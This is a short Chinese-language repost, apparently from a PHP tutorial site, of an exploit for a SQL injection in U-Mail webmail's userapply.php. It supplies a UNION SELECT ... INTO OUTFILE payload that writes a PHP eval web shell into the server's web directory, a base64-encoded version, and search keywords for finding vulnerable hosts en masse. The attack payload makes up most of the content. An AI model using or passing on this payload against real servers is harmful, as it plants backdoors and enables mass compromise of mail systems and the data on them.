来源:自学PHP网 时间:2015-04-15 14:59 作者: 阅读:次
[导读] u-mail中某个文件由于参数过滤不严谨导致产生了SQL注入,通过此漏洞可以将shell写入到web目录下,可批量getshell。Baidu Google Keywords:-Power by U-Mail *精...
u-mail中某个文件由于参数过滤不严谨导致产生了SQL注入,通过此漏洞可以将shell写入到web目录下,可批量getshell。
Baidu & Google Keywords: http://xxx.com/webmail/userapply.php?execadd=333&DomainID=111
注入webshell代码: aa' union select 1,2,3,4,5,6,'<!--?php eval($_POST1);?-->',8,9,10,11,12,13,14 into outfile 'E:/umail/WorldClient/html/08sec.php'# 将其base64加密一下,记得路径是“/”,而不是”\” 得到: YWEnIHVuaW9uIHNlbGVjdCAxLDIsMyw0LDUsNiwnPD9waHAgZXZhbCgkX1BPU1Rbc2hlbGxdKTs/PicsOCw5LDEwLDExLDEyLDEzLDE0IGludG8gb3V0ZmlsZSAnRTovdW1haWwvV29ybGRDbGllbnQvaHRtbC8wOHNlYy5waHAnIw== 然后访问…..
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com